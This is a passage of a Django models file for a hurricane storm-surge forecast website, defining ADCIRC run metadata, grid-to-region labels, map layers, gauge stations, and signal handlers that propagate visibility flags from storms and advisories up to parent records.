models.BooleanField('Enable public web server', default=False)\n    enable_adminmode = models.BooleanField('Enable admin display', default=True)\n    program_version = models.IntegerField('Program version', default=8)\n    ### original data host (ADCIRC/SWAN data)\n    adcirc_datahost = models.CharField('ADCIRC data host', max_length=30, null=True, blank=True, choices=ADCIRCDATAHOST_CHOICES)\n    ### data_host (tif, wfs data)\n    wmsserver = models.CharField('CERA data host', max_length=4, null=True, blank=True, choices=WMSSERVER_CHOICES)\n    ### tilecache\n    nr_cacheserver = models.IntegerField('CERA cache hosts', default=0)\n\n    asgs_dev = models.BooleanField('ASGS-DEV', default=False)\n    asgs_pro = models.BooleanField('ASGS-PRO', default=False)\n    asgs_pub = models.BooleanField('ASGS-PUB', default=False)\n    asgs_nc = models.BooleanField('ASGS-NC', default=False)\n    asgs_ng = models.BooleanField('ASGS-NG', default=False)\n    asgs_pr = models.BooleanField('ASGS-PR', default=False)\n    asgs_ri = models.BooleanField('ASGS-RI', default=False)\n    asgs_st = models.BooleanField('ASGS-ST', default=False)\n\n    # show this run as default when multiple runs are available with the same starttime\n    default_view = models.BooleanField('Default view', default=False)\n\n    # ocean basin that triggers the nc/ng/nc_ng map settings on the website\n    website_region = models.CharField('Website region', max_length=5, null=True, blank=True, choices=MAP_REGION)\n    #show correct legend images\n    legend = models.CharField(max_length=7, choices=LEGEND_CHOICES)\n\n    def set_nr_cacheserver(self):\n        if self.wmsserver in (\"LA1\", \"NC1\", \"NC2\", \"LA3\", \"LA4\", \"LA5\", \"LA6\"):\n            self.nr_cacheserver = 4\n        else:\n            self.nr_cacheserver = 0\n\n    def init_grid_datum(self):\n        if self.grid in (\"nc6b\", \"nc_inundation_v9.99\", \"nc_inundation_v9.99_w_rivers\", \"FEMA_R2_merge_VALID_correct_gcs_mNAVD\", \"FEMAR3\", \"ec95d\", \"prv01\", \"NACCS_2014_r01\", \"narragansett\", \"narragansett_bay_ec_95d_v2\", \"hsofs\", \"LPRBv1\"):\n            
self.grid_datum = 'msl'\n else:\n self.grid_datum = 'navd'\n\n def grid_datum_text(self):\n if self.grid_datum == 'msl':\n return 'MSL'\n return 'NAVD88'\n\n def __unicode__(self):\n return \"ID: %s\" % self.id\n\n class Meta:\n verbose_name = \"ADCIRC Run Info\"\n verbose_name_plural = \"ADCIRC Run Info\"\n ordering = ['adcrun_daytime_utc']\n\n# -----------------------------------------------------------------------------\n # model info select box for DEV site (windmodel/grid)\n\n def get_model_info_text_pro(self):\n windmodel = 'Unknown'\n if self.windmodel is not None:\n windmodel = self.get_windmodel_display()\n seq = ''\n if self.sequence_nr is not None:\n seq = ' (%s)' % self.sequence_nr\n return '%s / %s%s' % (windmodel, self.get_mapped_grid_display(), seq)\n\n def get_model_info_text_dev(self):\n windmodel = 'Unknown'\n if self.windmodel is not None:\n windmodel = self.get_windmodel_display()\n# if self.asgs_instance is not None and self.asgs_instance != '':\n# return '%s / %s (%s)' % (windmodel, self.get_mapped_grid_display(), self.asgs_instance)\n return '%s / %s' % (windmodel, self.get_mapped_grid_display())\n\n# 'best for' select box on public pages (ng,nc,pr)\n# if for selected time either only storm or only NAM run exist\n def grid_region_text(self):\n region = 'Unknown'\n if self.grid == \"sl16_alpha_2007_26\":\n region = \"Northern Gulf\"\n elif self.grid == \"ec95d\":\n region = \"all regions - low resolution\"\n elif self.grid == \"ocpr_v19a_DesAllemands4CERA\" or self.grid == \"cpra_2011_v03a\" or self.grid == \"cpra_2017_v07a_chk\" \\\n or self.grid == \"cpra2017_v11k-CurrentConditions_chk\" or self.grid == \"cpra2017_v12c-CurrentConditions-WithUpperAtch_chk\" \\\n or self.grid == \"sl15v3_2007_r9a\" or self.grid == \"sl15_2007_IHNC_r03q_levchk\" \\\n or self.grid == \"LA_v12h-WithUpperAtch\" or self.grid == \"LA_v17a-WithUpperAtch_chk\":\n region = \"Louisiana\"\n elif self.grid == \"sl15_2010_HSDRRS_2012_v9\" or self.grid == \"HSDRRS2014_MRGO_leveeupdate_fixSTC_MX\":\n region = \"East Louisiana\"\n elif self.grid == \"nc6b\" or self.grid == \"nc_inundation_v9.99\" or self.grid == \"nc_inundation_v9.99_w_rivers\":\n region = \"North Carolina\"\n elif self.grid == \"FEMA_R2_merge_VALID_correct_gcs_mNAVD\":\n region = \"New Jersey\"\n elif self.grid == \"FEMAR3\":\n region = \"Virginia/Maryland\"\n elif self.grid == \"FEMAR4\":\n region = \"Mississippi/Alabama\"\n elif self.grid == \"ULLR2D\":\n region = \"Gulf of Mexico\"\n elif self.grid == \"prv01\":\n region = \"Puerto Rico\"\n elif self.grid == \"tx2008r35h\" or self.grid == \"tx2008r35hred\":\n region = \"Texas\"\n elif self.grid == \"NACCS_2014_r01\":\n region = \"North Atlantic\"\n elif self.grid == \"narragansett\" or self.grid == \"narragansett_bay_ec_95d_v2\":\n region = \"Rhode Island\"\n elif self.grid == \"hsofs\":\n region = \"Atlantic/Gulf\"\n elif self.grid == \"wFL_v4.1.0\":\n region = \"West Florida\"\n elif self.grid == \"ECIRL\":\n region = \"East Florida\"\n elif self.grid == \"LPRBv1\":\n region = \"Lower Pearl River\"\n\n return '%s' % region\n\n# 'best for' select box\n # if for selected time multiple runs exist\n def grid_region1_text(self):\n region = self.grid_region_text()\n seq = ''\n if self.sequence_nr is not None:\n seq = ' (%s)' % self.sequence_nr\n return '%s%s' % (region, seq)\n\n # if for selected time both storm + NAM run exist\n def grid_region2_text(self):\n region = self.grid_region_text()\n seq = ''\n if self.sequence_nr is not None:\n seq = ' (%s)' % self.sequence_nr\n\n if 
self.has_adv:\n            return '%s%s' % (region, seq)\n        else:\n            return '%s (NAM)%s' % (region, seq)\n\n# show in select box a different name than the get_grid_display name\n    def get_mapped_grid_display(self):\n        mapped_name = self.get_grid_display()\n        if self.grid == 'cpra_2011_v03a':\n            mapped_name = 'CPRA2011'\n        elif self.grid == 'ocpr_v19a_DesAllemands4CERA':\n            mapped_name = 'OCPR'\n        elif self.grid == 'cpra_2017':\n            mapped_name = 'CPRA2017v07'\n        elif self.grid == 'sl15_2010_HSDRRS_2012_v9':\n            mapped_name = 'HSDRRS2012'\n#        elif self.grid == 'nc_inundation_v9.99':\n#            mapped_name = 'NCv999'\n        elif self.grid == 'tx2008r35hred':\n            mapped_name = 'TX2008reduced'\n        elif self.grid == 'FEMA_R2_merge_VALID_correct_gcs_mNAVD':\n            mapped_name = 'FEMAR2'\n        elif self.grid == 'hsofs':\n            mapped_name = 'HSOFS'\n\n        return mapped_name\n\n# -----------------------------------------------------------------------------\n    def get_sequence_nr(self):\n        if self.sequence_nr is None:\n            return ''\n        else:\n            if self.asgs_instance is None:\n                return ' (%s)' % self.sequence_nr\n            return ' (%s)' % self.asgs_instance\n#            return ' (%s)' % self.sequence_nr\n\n# -----------------------------------------------------------------------------\n    # windmodel for legend (difference maps - hindcast comparisons)\n    def get_windmodel_diffmaps(self):\n        if self.windmodel is not None:\n            return '%s' % self.get_windmodel_display()\n\n# -----------------------------------------------------------------------------\n# adcrun_time in 'Time' select box (used in views.py)\n    def get_adcrun_time(self):\n        return self.adcrun_daytime_utc #.strftime('%H:%M %Z')\n\n# -----------------------------------------------------------------------------\n# calculate length of best track in days for hindcast track display in menu\n    def get_hindcast_days(self):\n        # assumes adcrun_enddaytime_utc is set for hindcast runs (see fields above)\n        return (self.adcrun_enddaytime_utc - self.adcrun_daytime_utc).days\n\n# set data_host for pre-defined cache tiles\n    def get_data_host_cache_display(self):\n        data_host = self.wmsserver\n        if data_host == 'NC1':\n            return get_data_host_display('NC2')\n        if data_host == 'NC2':\n            return get_data_host_display('NC1')\n        if data_host == 'LA5':\n            return get_data_host_display('LA4')\n        return get_data_host_display('LA5')\n#        return get_data_host_display('LA4')\n\n\n###############################################################################\nclass subtrack(models.Model):\n    id = models.AutoField('ID', primary_key=True, unique=True)\n    adcrunid = models.ForeignKey(adcrun_info, on_delete=models.CASCADE)\n    trackid = models.ForeignKey(track, on_delete=models.CASCADE)\n\n    def __unicode__(self):\n        return \"ID: %s\" % (self.adcrunid.id)\n\n
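# subtrack is a plain join table: it links one model run (adcrun_info) to one\n# additional track so the website can offer clickable subtracks in the menu.\n\n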
#####################################################################################\nLAYER_CHOICES = (\n    ### timesteps layers SHP\n    (\"elevshp\", \"elevshp\"),\n    (\"inunshp\", \"inunshp\"),\n    (\"hsignshp\", \"hsignshp\"),\n    (\"tpsshp\", \"tpsshp\"),\n    (\"wvelshp\", \"wvelshp\"),\n    (\"wvel10shp\", \"wvel10shp\"),\n    ### max layers SHP\n    (\"maxelevshp\", \"maxelevshp\"),\n    (\"maxinunshp\", \"maxinunshp\"),\n    (\"maxhsignshp\", \"maxhsignshp\"),\n    (\"maxtpsshp\", \"maxtpsshp\"),\n    (\"maxwvelshp\", \"maxwvelshp\"),\n    (\"maxwvel10shp\", \"maxwvel10shp\"),\n    ### stations\n    (\"hydro\", \"hydro\"),\n    (\"hydroval\", \"hydroval\"),\n    (\"prec\", \"prec\"),\n    (\"precimg\", \"precimg\"),\n    ### storm info\n    (\"track_invest\", \"track_invest\"),\n    (\"track_sub\", \"track_sub\"),\n    ### timesteps layers TIF\n    (\"elev\", \"elev\"),\n    (\"inun\", \"inun\"),\n    (\"hsign\", \"hsign\"),\n    (\"tps\", \"tps\"),\n    (\"wvel\", \"wvel\"),\n    (\"wvelf\", \"wvelf\"),\n    ### max layers TIF\n    (\"maxelev\", \"maxelev\"),\n    (\"maxinun\", \"maxinun\"),\n    (\"maxhsign\", \"maxhsign\"),\n    (\"maxtps\", \"maxtps\"),\n    (\"maxwvel\", \"maxwvel\"),\n    ### max layers (autoscale) TIF\n    (\"maxelev_auto\", \"maxelev_auto\"),\n    (\"maxinun_auto\", \"maxinun_auto\"),\n    (\"maxhsign_auto\", \"maxhsign_auto\"),\n    (\"maxtps_auto\", \"maxtps_auto\"),\n    (\"maxwvel_auto\", \"maxwvel_auto\"),\n    ### difference layers (hindcast comparisons)\n    (\"diffmaxwvelhist\", \"diffmaxwvelhist\")\n)\n\nclass layerinfo(models.Model):\n\n    id = models.AutoField(primary_key=True, unique=True)\n    layername = models.CharField('layer exists', max_length=20, choices = LAYER_CHOICES)\n#    layer_output_start = models.DateTimeField('layer output start time', null=True, blank=True)\n#    layer_output_end = models.DateTimeField('layer output end time', null=True, blank=True)\n    show_layer = models.BooleanField(verbose_name='display layer', default=True)\n\n    # this should be a many-to-many relation -> one layerinfo can have many adcrun_infos\n    # adcrun_infos = models.ManyToManyField(adcrun_info)\n    # the used approach blows up the DB but is much simpler in admin.py/views.py\n    adcrun_info = models.ForeignKey(adcrun_info, on_delete=models.CASCADE)\n\n    def __unicode__(self):\n        return \"%s\" % self.adcrun_info\n\n    class Meta:\n        #name for class\n        verbose_name_plural = \"Layer Info\"\n\n
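# One layerinfo row exists per (model run, layer name) pair; show_layer merely\n# hides a layer in the viewer without deleting the record.\n\n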
################################################################################\n# stations to display hydrographs\nclass hydro(models.Model):\n    id = models.AutoField(primary_key=True, unique=True)\n    stationid = models.CharField(max_length=18, null=True, blank=True)\n    stationname = models.CharField(max_length=60, null=True, blank=True)\n    state = models.CharField(max_length=2)\n    agency = models.CharField(max_length=8)\n    # human-readable for charts\n    agencyname = models.CharField(max_length=8)\n    realtimeurl = models.CharField(max_length=150, null=True, blank=True)\n    alt_stationid = models.CharField(max_length=18, null=True, blank=True)\n    alt_agencyname = models.CharField(max_length=8)\n    alt_realtimeurl = models.CharField(max_length=150, null=True, blank=True)\n\n    def __unicode__(self):\n        return self.stationname\n\n################################################################################\n# stations to display precipitation\nclass prec(models.Model):\n    id = models.AutoField(primary_key=True, unique=True)\n    stationid = models.CharField(max_length=18, null=True, blank=True)\n    stationname = models.CharField(max_length=60, null=True, blank=True)\n    state = models.CharField(max_length=2)\n    agency = models.CharField(max_length=9)\n    agencyname = models.CharField(max_length=4)\n    realtimeurl = models.CharField(max_length=150, null=True, blank=True)\n\n    def __unicode__(self):\n        return self.stationname\n\n################################################################################\n# assign CERA servers to HPC machines\n# decides whether the complete CERA workflow (for nc_ng/pro) or the limited workflow (pub) will be executed on the given CERA server -> cera.process.py\nclass filter_ceraserver(models.Model):\n\n    id = models.AutoField('ID', primary_key=True, unique=True)\n    cera_datahost = models.CharField('CERA data host', max_length=4, null=True, blank=True, choices=WMSSERVER_CHOICES)\n    adcirc_datahost = models.CharField('ADCIRC data host', max_length=30, null=True, blank=True, choices=ADCIRCDATAHOST_CHOICES)\n    # combination CERA/ADCIRCHOST is allowed for ASGS runs\n    active = models.BooleanField('active', default=False)\n    # runs the pub or pro CERA workflow\n    pro_model_run = models.BooleanField('PRO model run', help_text='Set to start the CERA workflow for the PRO website. If not set, the reduced workflow for the PUB website will be executed.', default=False)\n\n    def __unicode__(self):\n        return \"%s\" % self.id\n\n    class Meta:\n        verbose_name = \"Filter CERA Servers\"\n        verbose_name_plural = \"Filter CERA Servers\"\n        ordering = ['cera_datahost']\n\n################################################################################\n# filter ASGS runs (meshes and tracks) and assign default mesh\nclass filter_asgs(models.Model):\n\n    #primary model run ID\n    id = models.AutoField('ID', primary_key=True, unique=True)\n    grid = models.CharField('ADCIRC grid', max_length=50, choices=GRID_CHOICES)\n\n    # show this grid as default when multiple runs are available with the same starttime\n    # will be used to set default grid for each run in adcrun_info with filldb_info.py\n    default_view_ng = models.BooleanField('Default NG', default=False)\n    default_view_nc = models.BooleanField('Default NC', default=False)\n    default_view_pro = models.BooleanField('Default PRO', default=False)\n\n    daily = models.BooleanField(default=True)\n    stormt01 = models.BooleanField('NHC Consensus', default=True)\n    stormt02 = models.BooleanField('max wind speed', default=True)\n    stormt03 = models.BooleanField('over land speed', default=True)\n    stormt04 = models.BooleanField('veer left', default=True)\n    stormt05 = models.BooleanField('veer right', default=True)\n    stormt06 = models.BooleanField('max radius', default=True)\n    stormt07 = models.BooleanField('max wind speed only', default=True)\n    stormt08 = models.BooleanField('constant max radius', default=True)\n    stormt14 = models.BooleanField('shift left', default=True)\n    stormt15 = models.BooleanField('shift right', default=True)\n    # hypothetical runs\n    stormt88 = models.BooleanField('synthetic', default=True)\n\n    def __unicode__(self):\n        return \"%s\" % self.id\n\n    class Meta:\n        verbose_name = \"Filter ASGS Runs\"\n        verbose_name_plural = \"Filter ASGS Runs\"\n        ordering = ['grid']\n\n###############################################################################\ndef find_or_create_year(year):\n\n    # try to find the year in 'storm_year'\n    year_info = storm_year.objects.filter(year=year)\n\n    if len(year_info) == 0:\n        # 'year' does not exist in db, create a new one\n        thisyear = storm_year()\n        thisyear.year = year\n        thisyear.save(force_insert=True)\n\n    else:\n        # use existing record from 'storm_year' (entire data record)\n        thisyear = year_info[0]\n\n    return thisyear\n\n
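# The helpers below repeat this get-or-create pattern one level further down the\n# storm_year -> storm -> advisory -> track hierarchy, e.g. (illustrative):\n#   this_year = find_or_create_year('2017')  # existing row, or a freshly saved one\n\n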
def find_or_create_storminfo(this_year, stormnr, stormname, firstadv_dt, adv):\n\n    storm_name = None\n    if stormname is not None and len(stormname) > 0:\n        storm_name = stormname\n\n    has_hindcast = False\n    if adv == '999':\n        has_hindcast = True\n\n    # try to find the storm via 'thisyear.id' and 'stormnr' in 'storm'\n    storm_info = storm.objects \\\n        .filter(year=this_year.id) \\\n        .filter(storm_number=stormnr)\n\n    if len(storm_info) == 0:\n        # 'storm' does not exist in db, create a new one\n        thisstorm = storm()\n        thisstorm.year = this_year\n        thisstorm.storm_number = stormnr\n        if storm_name is not None:\n            thisstorm.stormname = storm_name\n        else:\n            thisstorm.stormname = \"Storm: %s\" % stormnr\n        if firstadv_dt is not None:\n            thisstorm.start_date_utc = firstadv_dt\n        if has_hindcast:\n            thisstorm.has_hindcast = True\n        thisstorm.save(force_insert=True)\n\n    else:\n        # use existing record from db (entire data record)\n        thisstorm = storm_info[0]\n\n    # optional parameters may need to be updated with each new run\n    need_update = False\n    if stormname is not None and thisstorm.stormname != stormname:\n        thisstorm.stormname = stormname\n        need_update = True\n#    if len(firstadv) > 0 and thisstorm.start_date_utc != firstadv_dt:\n    # firstadv in storm.bal is often too early and manually corrected in the DB, do not overwrite\n    if firstadv_dt is not None and thisstorm.start_date_utc is None:\n        thisstorm.start_date_utc = firstadv_dt\n        need_update = True\n    if has_hindcast and not thisstorm.has_hindcast:\n        thisstorm.has_hindcast = True\n        need_update = True\n    if need_update:\n        thisstorm.save(force_update=True)\n\n    return thisstorm\n\ndef find_or_create_advinfo(this_storminfo, adv, stormclass, category, advtime_dt):\n\n    # try to find the advisory via 'thisstorm.id' and 'adv' in 'advisory'\n    adv_info = advisory.objects \\\n        .filter(storm=this_storminfo.id) \\\n        .filter(advisory=adv)\n\n    if len(adv_info) == 0:\n        # 'advisory' does not exist in db, create a new one\n        thisadv = advisory()\n        thisadv.storm = this_storminfo\n        thisadv.advisory = adv\n        if stormclass is not None:\n            thisadv.stormclass = stormclass\n        if category is not None:\n            thisadv.category = category\n        if advtime_dt is not None:\n            thisadv.adv_time_utc = advtime_dt\n        thisadv.save(force_insert=True)\n\n    else:\n        # use existing record from db (entire data record)\n        thisadv = adv_info[0]\n\n    # optional parameters can be updated with each new run\n    need_update = False\n    if stormclass is not None and thisadv.stormclass != stormclass:\n        thisadv.stormclass = stormclass\n        need_update = True\n    if category is not None and thisadv.category != category:\n        thisadv.category = category\n        need_update = True\n    if need_update:\n        thisadv.save(force_update=True)\n\n    return thisadv\n\ndef find_or_create_trackinfo(this_advinfo, tracknr, percent):\n\n    if len(percent) == 0:\n        percent = '0'\n\n    # try to find the track via 'thisadv.id' and 'tracknr' in 'track'\n    track_info = track.objects \\\n        .filter(advisory=this_advinfo.id) \\\n        .filter(track=tracknr) \\\n        .filter(mod_percent=percent)\n\n    if len(track_info) == 0:\n        # 'track' does not exist in db, create a new one\n        thistrack = track()\n        thistrack.advisory = this_advinfo\n        thistrack.track = tracknr\n        thistrack.mod_percent = percent\n        thistrack.save(force_insert=True)\n\n    else:\n        # use existing record from 'track'\n        thistrack = track_info[0]\n\n    return thistrack\n\ndef create_storm_records(year, stormnr, stormname, firstadv_dt, adv, stormclass, category, advtime_dt, tracknr, percent):\n    # the only unique storm model is the storm_year model\n    # (given the available URL parameters)\n    # that's why the test needs to start from the storm_year downwards\n\n    this_year = find_or_create_year(year)\n    this_storminfo = find_or_create_storminfo(this_year, stormnr, stormname, firstadv_dt, adv)\n    this_advinfo = find_or_create_advinfo(this_storminfo, adv, stormclass, category, advtime_dt)\n    this_track = find_or_create_trackinfo(this_advinfo, tracknr, percent)\n\n    return this_track\n\n##############################################################################\n# signal handler will be called on new record/update of a record in\n# model 'storm' (post_save) and changes the 'dependent_xxx' fields in the\n# parent model 'year'\ndef on_storm_update(sender, **kwargs):\n\n    changed_storm = kwargs.pop('instance', None)\n    year = changed_storm.year\n\n    if year is not None:\n        year_storms = sender.objects.all().filter(year=year)\n\n        # update the dependent_asgs_dev fields\n        year.dependent_asgs_dev = 
False\n year.dependent_enable_public_dev = False\n year.dependent_enable_adminmode_dev = False\n\n storms_dev = year_storms.filter(dependent_asgs_dev=1)\n if storms_dev.count() > 0:\n year.dependent_asgs_dev = True\n if storms_dev.filter(dependent_enable_public_dev=1).count() > 0:\n year.dependent_enable_public_dev = True\n if storms_dev.filter(dependent_enable_adminmode_dev=1).count() > 0:\n year.dependent_enable_adminmode_dev = True\n\n # update the dependent_asgs_pro fields\n year.dependent_asgs_pro = False\n year.dependent_enable_public_pro = False\n year.dependent_enable_adminmode_pro = False\n\n storms_pro = year_storms.filter(dependent_asgs_pro=1)\n if storms_pro.count() > 0:\n year.dependent_asgs_pro = True\n if storms_pro.filter(dependent_enable_public_pro=1).count() > 0:\n year.dependent_enable_public_pro = True\n if storms_pro.filter(dependent_enable_adminmode_pro=1).count() > 0:\n year.dependent_enable_adminmode_pro = True\n\n # update the dependent_asgs_pub fields\n year.dependent_asgs_pub = False\n year.dependent_enable_public_pub = False\n year.dependent_enable_adminmode_pub = False\n\n storms_pub = year_storms.filter(dependent_asgs_pub=1)\n if storms_pub.count() > 0:\n year.dependent_asgs_pub = True\n if storms_pub.filter(dependent_enable_public_pub=1).count() > 0:\n year.dependent_enable_public_pub = True\n if storms_pub.filter(dependent_enable_adminmode_pub=1).count() > 0:\n year.dependent_enable_adminmode_pub = True\n\n # update the dependent_asgs_nc fields\n year.dependent_asgs_nc = False\n year.dependent_enable_public_nc = False\n year.dependent_enable_adminmode_nc = False\n\n storms_nc = year_storms.filter(dependent_asgs_nc=1)\n if storms_nc.count() > 0:\n year.dependent_asgs_nc = True\n if storms_nc.filter(dependent_enable_public_nc=1).count() > 0:\n year.dependent_enable_public_nc = True\n if storms_nc.filter(dependent_enable_adminmode_nc=1).count() > 0:\n year.dependent_enable_adminmode_nc = True\n\n # update the dependent_asgs_ng fields\n year.dependent_asgs_ng = False\n year.dependent_enable_public_ng = False\n year.dependent_enable_adminmode_ng = False\n\n storms_ng = year_storms.filter(dependent_asgs_ng=1)\n if storms_ng.count() > 0:\n year.dependent_asgs_ng = True\n if storms_ng.filter(dependent_enable_public_ng=1).count() > 0:\n year.dependent_enable_public_ng = True\n if storms_ng.filter(dependent_enable_adminmode_ng=1).count() > 0:\n year.dependent_enable_adminmode_ng = True\n\n # update the dependent_asgs_pr fields\n year.dependent_asgs_pr = False\n year.dependent_enable_public_pr = False\n year.dependent_enable_adminmode_pr = False\n\n storms_pr = year_storms.filter(dependent_asgs_pr=1)\n if storms_pr.count() > 0:\n year.dependent_asgs_pr = True\n if storms_pr.filter(dependent_enable_public_pr=1).count() > 0:\n year.dependent_enable_public_pr = True\n if storms_pr.filter(dependent_enable_adminmode_pr=1).count() > 0:\n year.dependent_enable_adminmode_pr = True\n\n # and update the dependent_asgs_ri fields\n year.dependent_asgs_ri = False\n year.dependent_enable_public_ri = False\n year.dependent_enable_adminmode_ri = False\n\n storms_ri = year_storms.filter(dependent_asgs_ri=1)\n if storms_ri.count() > 0:\n year.dependent_asgs_ri = True\n if storms_ri.filter(dependent_enable_public_ri=1).count() > 0:\n year.dependent_enable_public_ri = True\n if storms_ri.filter(dependent_enable_adminmode_ri=1).count() > 0:\n year.dependent_enable_adminmode_ri = True\n\n # update the dependent_asgs_st fields\n year.dependent_asgs_st = False\n 
year.dependent_enable_public_st = False\n        year.dependent_enable_adminmode_st = False\n\n        storms_st = year_storms.filter(dependent_asgs_st=1)\n        if storms_st.count() > 0:\n            year.dependent_asgs_st = True\n            if storms_st.filter(dependent_enable_public_st=1).count() > 0:\n                year.dependent_enable_public_st = True\n            if storms_st.filter(dependent_enable_adminmode_st=1).count() > 0:\n                year.dependent_enable_adminmode_st = True\n\n        #####\n        # dependent_region handling\n        # dependent_region for pro is nc/ng/nc_ng; no region for dev/st/pub (always nc_ng)\n\n        year.dependent_region_nc_ng = False\n        storms_region_nc_ng = year_storms.filter(dependent_region_nc_ng = True)\n        if storms_region_nc_ng.count() > 0:\n            year.dependent_region_nc_ng = True\n\n        year.dependent_region_nc = False\n        storms_region_nc = year_storms.filter(dependent_region_nc = True)\n        if storms_region_nc.count() > 0:\n            year.dependent_region_nc = True\n\n        year.dependent_region_ng = False\n        storms_region_ng = year_storms.filter(dependent_region_ng = True)\n        if storms_region_ng.count() > 0:\n            year.dependent_region_ng = True\n\n        year.dependent_region_pr = False\n        storms_region_pr = year_storms.filter(dependent_region_pr = True)\n        if storms_region_pr.count() > 0:\n            year.dependent_region_pr = True\n\n        year.dependent_region_ri = False\n        storms_region_ri = year_storms.filter(dependent_region_ri = True)\n        if storms_region_ri.count() > 0:\n            year.dependent_region_ri = True\n\n        year.save(force_update=True)\n\n# register signal handlers for model 'storm'\npost_save.connect(on_storm_update, sender=storm, dispatch_uid=\"storm1\")\npost_delete.connect(on_storm_update, sender=storm, dispatch_uid=\"storm2\")\n\n\n# signal handler will be called on new record/update of a record in\n# model 'advisory' (post_save) and changes the 'dependent_xxx' fields in the\n# parent model 'storm'\ndef on_advisory_update(sender, **kwargs):\n\n    changed_advisory = kwargs.pop('instance', None)\n    storm = changed_advisory.storm\n\n    if storm is not None:\n        storm_advs = sender.objects.all().filter(storm=storm)\n\n        # update the dependent_asgs_dev fields\n        storm.dependent_asgs_dev = False\n        storm.dependent_enable_public_dev = False\n        storm.dependent_enable_adminmode_dev = False\n\n        advisories_dev = storm_advs.filter(dependent_asgs_dev=1)\n        if advisories_dev.count() > 0:\n            storm.dependent_asgs_dev = True\n            if advisories_dev.filter(dependent_enable_public_dev=1).count() > 0:\n                storm.dependent_enable_public_dev = True\n            if advisories_dev.filter(dependent_enable_adminmode_dev=1).count() > 0:\n                storm.dependent_enable_adminmode_dev = True\n\n
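        # the same reset-and-recompute rollup repeats for each ASGS instance below\n        # (pro/pub/nc/ng/pr/ri/st); only the field suffix changes\n\n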
        # update the dependent_asgs_pro fields\n        storm.dependent_asgs_pro = False\n        storm.dependent_enable_public_pro = False\n        storm.dependent_enable_adminmode_pro = False\n\n        advisories_pro = storm_advs.filter(dependent_asgs_pro=1)\n        if advisories_pro.count() > 0:\n            storm.dependent_asgs_pro = True\n            if advisories_pro.filter(dependent_enable_public_pro=1).count() > 0:\n                storm.dependent_enable_public_pro = True\n            if advisories_pro.filter(dependent_enable_adminmode_pro=1).count() > 0:\n                storm.dependent_enable_adminmode_pro = True\n\n        # update the dependent_asgs_pub fields\n        storm.dependent_asgs_pub = False\n        storm.dependent_enable_public_pub = False\n        storm.dependent_enable_adminmode_pub = False\n\n        advisories_pub = storm_advs.filter(dependent_asgs_pub=1)\n        if advisories_pub.count() > 0:\n            storm.dependent_asgs_pub = True\n            if advisories_pub.filter(dependent_enable_public_pub=1).count() > 0:\n                storm.dependent_enable_public_pub = True\n            if advisories_pub.filter(dependent_enable_adminmode_pub=1).count() > 0:\n                storm.dependent_enable_adminmode_pub = True\n\n        # update the dependent_asgs_nc fields\n        storm.dependent_asgs_nc = False\n        storm.dependent_enable_public_nc = False\n        storm.dependent_enable_adminmode_nc = False\n\n        advisories_nc = storm_advs.filter(dependent_asgs_nc=1)\n        if advisories_nc.count() > 0:\n            storm.dependent_asgs_nc = True\n            if advisories_nc.filter(dependent_enable_public_nc=1).count() > 0:\n                storm.dependent_enable_public_nc = True\n            if advisories_nc.filter(dependent_enable_adminmode_nc=1).count() > 0:\n                storm.dependent_enable_adminmode_nc = True\n\n        # update the dependent_asgs_ng fields\n        storm.dependent_asgs_ng = False\n        storm.dependent_enable_public_ng = False\n        storm.dependent_enable_adminmode_ng = False\n\n        advisories_ng = storm_advs.filter(dependent_asgs_ng=1)\n        if advisories_ng.count() > 0:\n            storm.dependent_asgs_ng = True\n            if advisories_ng.filter(dependent_enable_public_ng=1).count() > 0:\n                storm.dependent_enable_public_ng = True\n            if advisories_ng.filter(dependent_enable_adminmode_ng=1).count() > 0:\n                storm.dependent_enable_adminmode_ng = True\n\n        # update the dependent_asgs_pr fields\n        storm.dependent_asgs_pr = False\n        storm.dependent_enable_public_pr = False\n        storm.dependent_enable_adminmode_pr = False\n\n        advisories_pr = storm_advs.filter(dependent_asgs_pr=1)\n        if advisories_pr.count() > 0:\n            storm.dependent_asgs_pr = True\n            if advisories_pr.filter(dependent_enable_public_pr=1).count() > 0:\n                storm.dependent_enable_public_pr = True\n            if advisories_pr.filter(dependent_enable_adminmode_pr=1).count() > 0:\n                storm.dependent_enable_adminmode_pr = True\n\n        # update the dependent_asgs_ri fields\n        storm.dependent_asgs_ri = False\n        storm.dependent_enable_public_ri = False\n        storm.dependent_enable_adminmode_ri = False\n\n        advisories_ri = storm_advs.filter(dependent_asgs_ri=1)\n        if advisories_ri.count() > 0:\n            storm.dependent_asgs_ri = True\n            if advisories_ri.filter(dependent_enable_public_ri=1).count() > 0:\n                storm.dependent_enable_public_ri = True\n            if advisories_ri.filter(dependent_enable_adminmode_ri=1).count() > 0:\n                storm.dependent_enable_adminmode_ri = True\n\n        # update the dependent_asgs_st fields\n        storm.dependent_asgs_st = False\n        storm.dependent_enable_public_st = False\n        storm.dependent_enable_adminmode_st = False\n\n        advisories_st = storm_advs.filter(dependent_asgs_st=1)\n        if advisories_st.count() > 0:\n            storm.dependent_asgs_st = True\n            if advisories_st.filter(dependent_enable_public_st=1).count() > 0:\n                storm.dependent_enable_public_st = True\n            if advisories_st.filter(dependent_enable_adminmode_st=1).count() > 0:\n                storm.dependent_enable_adminmode_st = True\n\n        #####\n        # dependent_region handling\n        # dependent_region for pro is nc/ng/nc_ng; no region for dev/st/pub (always nc_ng)\n\n        storm.dependent_region_nc_ng = False\n        advisories_region_nc_ng = storm_advs.filter(dependent_region_nc_ng = True)\n        if advisories_region_nc_ng.count() > 0:\n            storm.dependent_region_nc_ng = True\n\n        storm.dependent_region_nc = False\n        advisories_region_nc = storm_advs.filter(dependent_region_nc = 
True)\n if advisories_region_nc.count() > 0:\n storm.dependent_region_nc = True\n\n storm.dependent_region_ng = False\n advisories_region_ng = storm_advs.filter(dependent_region_ng = True)\n if advisories_region_ng.count() > 0:\n storm.dependent_region_ng = True\n\n storm.dependent_region_pr = False\n advisories_region_pr = storm_advs.filter(dependent_region_pr = True)\n if advisories_region_pr.count() > 0:\n storm.dependent_region_pr = True\n\n storm.dependent_region_ri = False\n advisories_region_ri = storm_advs.filter(dependent_region_ri = True)\n if advisories_region_ri.count() > 0:\n storm.dependent_region_ri = True\n\n storm.save(force_update=True)\n\n# register signal handlers for model 'advisory'\npost_save.connect(on_advisory_update, sender=advisory, dispatch_uid=\"adv1\")\npost_delete.connect(on_advisory_update, sender=advisory, dispatch_uid=\"adv2\")\n\n# signal handler will be called on new record/update of a record in\n# model 'track' (post_save) and changes the 'dependent_xxx' fields in the\n# parent model 'advisory'\ndef on_track_update(sender, **kwargs):\n\n changed_track = kwargs.pop('instance', None)\n adv = changed_track.advisory\n\n 